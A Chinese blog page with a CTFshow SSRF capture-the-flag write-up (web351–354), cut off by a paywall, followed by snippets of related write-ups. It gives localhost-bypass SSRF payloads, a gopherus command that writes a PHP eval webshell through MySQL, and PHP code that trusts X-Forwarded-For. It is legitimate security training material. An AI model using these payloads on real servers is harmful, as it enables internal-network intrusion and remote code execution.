CTFshow-WEB入门-SSRF

最新推荐文章于 2025-11-11 23:54:57 发布
原创 最新推荐文章于 2025-11-11 23:54:57 发布 · 1.9k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web #php #SSRF #信息安全

本文探讨了SSRF学习过程中的各种技巧,如进制绕过、特殊地址利用、域名重定向、IDNA编码限制突破、URL协议和路径限制,以及利用DNS重绑定和302跳转进行攻击。重点介绍了如何通过Python工具Gopherus和手动编码实现RCE和Redis Shell写入。

前言

开始学习SSRF,学习文章:
SSRF 学习记录(需要fq)
比较简单的题目就直接放payload了,不做解释。

web351

url=http://127.0.0.1/flag.php

web352

scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧:

  • 进制绕过 url=http://0x7F000001/flag.php
  • 0.0.0.0绕过 url=http://0.0.0.0/flag.php
  • 短标签绕过,但是这题我测试失败了,可能是我短标签的问题?
  • ipv6绕过[::1],这题也不行。
  • 使用句号绕过:url=http://127。0。0。1/flag.php,这题也不行。
  • 特殊的地址0,url=http://0/flag.php,还有url=http://127.1/flag.php,还有url=http://127.0000000000000.001/flag.php这样的。
  • dns重绑定其实也能用在这里,不过这题好像不行?不知道是不是我DNS的那个有问题。
  • 可能还有吧,想到了再补上。

web353

同上。

web354

把0和1都给ban了就不知道该怎么办了,看了一下yu师傅的博客,这题的本意是unicode的替换:

for i in range(128,65537):
    tmp=chr(i)
    try:
        res = tmp.encode('idna').decode('utf-8')
        #print(res)
        if("-") in res:
            continue
        print
最低0.47元/天 解锁文章
CTFshow_Web_SSRF——web351~web360(除354、357)
Ho1aAs‘s Blog
03-18 2600
文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完 前言 354和357由于端口改变、服务器所限等原因,无法解出 一、知识点 Ⅰ、SSRF攻击点 <?php $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,
ctfshow web入门-ssrf
akxnxbshai的博客
05-13 854
目录 开头: web 351 web 352 web 353 web 354 web 355 web 356 web 357 Web 358 Web 359 Web 360 开头: 简单了解一下SSRFSSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统
ctfshow-Web入门SSRF)351-360全通关详解
2301_80027701的博客
10-12 741
本文系统介绍了SSRF(服务器端请求伪造)攻击的多种绕过技术。首先解释了SSRF的概念及其危害,随后通过9个具体案例展示了不同过滤条件下的绕过方法:包括直接回环地址访问、进制转换、IP特殊写法、域名解析、短域名、重定向、URL解析特性、gopherus工具利用MySQL协议攻击以及Redis攻击等。每个案例都提供了具体的payload构造方法,如使用0x7F替代127、127.1简写、外部域名重定向、gopher://协议等。特别强调了在严格过滤条件下如何利用工具和协议特性实现内网探测和服务攻击,为安全测试
ctfshowweb入门SSRF
最新发布
TohsakaRinRinRi的博客
11-11 748
文件从外部无法访问。这就引出了ssrf
ctfshow-web入门 ssrf
volcano的博客
03-06 2701
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 危害 SSRF可以对外网、
ctfshow web入门ssrf
xiaolong22333的博客
04-28 1345
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
ctfshow web入门 SSRF(超详解)
qq_50589021的博客
09-08 8677
前言 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) https://ctf-wiki.org/web/ssrf/ https://www.freebuf.com/articles/web/260806.html web351 <?php error_reporting(0)
CTFShow Web 入门 XSS
tj13995958709的博客
04-14 3054
这一题用上一题的做法就不行,这一题admin的cookie是一直在变的,而且很快,看到此题还有修改密码的功能,注册个普通账号,在修改密码时抓包。当将这行脚本代码提交后,稍等片刻,会有个类似admin管理员的程序每隔一段时间就查看我们提交的连接,然后就可以拿到admin的cookie。这道题它代码逻辑有问题,转账的不扣转账方的金额,所以可以一直向自己转账,转的金额不超过自己余额即可。直接让admin转自己10000,和上题让admin自己改密码思路是一样的。然后登录admin账号,密码输入123456。
CTFSHOW-web入门-SSRFweb351-web360)
JL20050725的博客
08-09 1080
有关SSRF的更多讲解可以看我的另一篇文章。
ctfshow--web入门--SSRF
weixin_74985952的博客
07-09 439
gethostbyname()这里对url对应的ip地址进行了检测,因此不能使用短网址,域名解析等手段了,只能采用重定向的方式,构建一个重定向的网页,跳转至http://127.0.0.1/flag.php即可,然后将文件放入服务器中,去访问它即可。这里一样的方法,攻击redis数据库,默认生成的文件名为shell.php,将payload中带有百分号的部分进行二次编码然后进行传参即可。源码中要求http://ctf.开头,以show结尾才可以进行读取url。最后在check.php页面进行传参。
ctfshow web入门 ssrf web351--web360
2301_81040377的博客
05-14 524
我测试了一下会显示504,我以为是环境的问题就没有整了,结果问了大菜鸡师傅,没问题,直接访问shell.php就行,这个故事告诉我们还是要多尝试。127.0.0.0/8是一个环回地址网段,从127.0.0.1 ~ 127.255.255.254都表示localhost。这道题我先是直接想访问flag.php,后来回显说必须是本地,于是payload。ip地址还可以通过表示成其他进制的形式访问,IP地址二进制、十进制、十六进制互换。然后访问shell.php进行rce即可。用服务器DNS重定向。
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 635
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
CTFshow-WEB入门-XSS
feng的博客
02-28 7166
前言 因为不太会javascript,所以对于xss的了解一直比较少,也不太会,这次做一下xss专题,学习一下xss。 web316 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! 意思是要生成链接,应该就还是获得管理员cookie这样的题目,大师傅们说题目的bot是每隔一段时间自动点击的。 可以利用xss平台: XSS平台 以后我都用自己vps。 首先测试一下<script>alert(1)</script>,弹窗成功,第一题应该是没有任何的过滤,所以直接打co
ctfshow web入门 xss篇
blowed的博客
01-01 904
xss
ctfshow web入门 xss(持续更新)
Lum1n0us's Blog
08-07 703
文章目录前言web316web317web318-319web320-325 前言 因为各种各样的问题,我这里就只让他弹窗,而不把获取flag作为目标了 web316 第一关,很简单,没有过滤,直接 <script>alert(0)</script> 就能弹窗 web317 有过滤了,可能是把script过滤了,可以用img标签 <img src=1 onerror=alert(0)> web318-319 img标签也被过滤了,可以用body标签,它被ban的概率比
ctfshow web入门 xss web327--web333 存储型和七七八八的
2301_81040377的博客
07-18 1382
这道题貌似和反射型的xss差不多,直接打就行。
ctf_show笔记篇(web入门---XSS)
whale_waves的博客
04-01 2049
这里简单对xss做一个了解:xss分为反射型和储存型反射型:一般是由攻击者选择攻击对象,对攻击对象发一个带有xss窃取cookie的页面的url,被攻击者点击就会动过document.cookie将用户信息一并发送给攻击方的服务器。反射型XSS一般发生在浏览器,当受害者访问含有XSS代码的页面时浏览器解析并执行XSS代码造成信息泄露。存储型:攻击方将恶意代码插入在存在漏洞的网站上,任何访问网站的人都会遭到攻击,比起反射型xss,存储型xss危害更大,范围更广。
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 2853
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
ctfshow web入门 SSRF
02-28
### CTFShow Web 入门 SSRF 漏洞 教程 #### 什么是SSRF漏洞 SSRF (Server-Side Request Forgery, 服务器端请求伪造)是一种安全漏洞,允许攻击者构造特定形式的数据输入使服务端发起恶意构建的请求。通常这类攻击旨在让目标服务器访问内网资源或其他受保护的服务接口,这些资源通常是外部网络不可达的[^1]。 #### 利用Gopher协议针对MySQL数据库实施SSRF攻击实例 对于某些场景下的CTF练习环境而言,可能存在未设置密码的MySQL数据库。通过抓取数据包并分析其中的内容可以发现`reurl`参数表现异常,暗示着这里可能存在着可被利用的SSRF缺陷。为了验证这一点以及进一步探索潜在的安全风险,可以通过gopher协议配合专门设计用于辅助测试此类问题的应用程序——比如`gopherus`工具来生成相应的载荷(payload),进而尝试连接至本地运行的MySQL服务,并执行指定命令创建webshell文件以便后续操作[^2]。 ```bash python2 gopherus.py --exploit mysql root select '<?php eval($_POST[cmd]);?>' into outfile '/var/www/html/4.php' ``` 此段Python脚本调用了`gopherus`库中的功能函数,目的是向位于同一台机器上的MySQL数据库发送SQL语句,在/var/www/html目录下写入含有PHP代码的小型网页文件(`4.php`),该页面接收远程传来的指令并予以解析执行,从而实现反序列化后的任意代码注入效果。 #### 构造特殊URL绕过IP白名单限制 当面对严格控制客户端来源地址的应用逻辑时,巧妙运用字符串拼接技巧同样能达成突破目的。例如下面给出了一种方法,即构造形似正常业务流量却暗藏玄机的HTTP GET请求路径: ```plaintext http://ctf.@127.0.0.1/flag.php?show ``` 上述链接表面上看像是指向了一个名为`ctf.show`网站内的某个子页面;但实际上由于中间夹杂了非法字符(@),使得最终实际发出的有效部分变成了对localhost上部署有`flag.php`脚本位置的一次探测行为。这正好满足了题目所给定条件:正则表达式要求以`http://ctf.`开头以`.show`结尾[^3]。 #### 分析基于XFF头字段的身份认证机制弱点 考虑到一些Web应用程序可能会依赖于HTTP头部信息来进行用户身份识别工作,则有必要深入研究其具体处理流程是否存在安全隐患。如下所示是一份简化版伪代码片段,描述了一个简单但容易受到操纵影响的过程: ```php $xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); array_pop($xff); $ip = array_pop($xff); if ($ip !== '127.0.0.1') { die('error'); } else { $token = $_POST['token']; if ($token === 'ctfshow') { file_put_contents('flag.txt', $flag); } } ``` 这段PHP代码首先获取到了HTTP请求中携带的`X-Forwarded-For`(简称XFF)首部项值列表,接着从中提取倒数第二个元素作为当前用户的公网出口IP地址表示。如果这个值不是代表回环适配器的IPv4地址(也就是常说的“localhost”),那么就拒绝继续向下执行任何敏感动作;反之则会检查另一个表单变量`token`是否匹配预设密钥串,一旦成功便触发保存FLAG文本的操作。然而值得注意的是,这种方式很容易遭到伪造篡改,因为大多数情况下浏览器是可以随意修改自定义HTTP头部内容而不必经过服务器授权确认环节[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值